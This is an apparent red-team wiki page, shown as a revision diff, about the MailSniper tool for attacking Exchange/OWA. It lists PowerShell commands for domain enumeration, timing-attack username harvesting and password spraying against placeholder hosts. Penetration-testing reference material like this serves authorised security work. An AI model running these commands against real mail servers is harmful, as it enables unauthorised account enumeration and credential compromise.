MailSniper: Difference between revisions

From RCATs
(Created page with "Category:Tools ==Description== ==Commands== <syntaxhighlight lang="powershell"> # Enumerate Netbios name Invoke-DomainHarvestOWA -ExchHostname mail.name.com # Uses timing attack to validate possible usernames with OWA server Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt # Password spray valid usernames with specific password Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Pass...")
 
No edit summary
Line 1: Line 1:
[[Category:Tools]]
[[Category:Tools]]
==Description==
==<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>Description==


==Commands==
==Commands<ref>https://github.com/dafthack/MailSniper</ref>==
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
# Enumerate Netbios name
# Enumerate Netbios name

Revision as of 12:27, 22 February 2023

[1]Description

Commands[2]

# Enumerate Netbios name
Invoke-DomainHarvestOWA -ExchHostname mail.name.com

# Uses timing attack to validate possible usernames with OWA server
Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt

# Password spray valid usernames with specific password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234


References

  1. https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
  2. https://github.com/dafthack/MailSniper
Retrieved from "https://rcats.dev/rcats/index.php?title=MailSniper&oldid=747"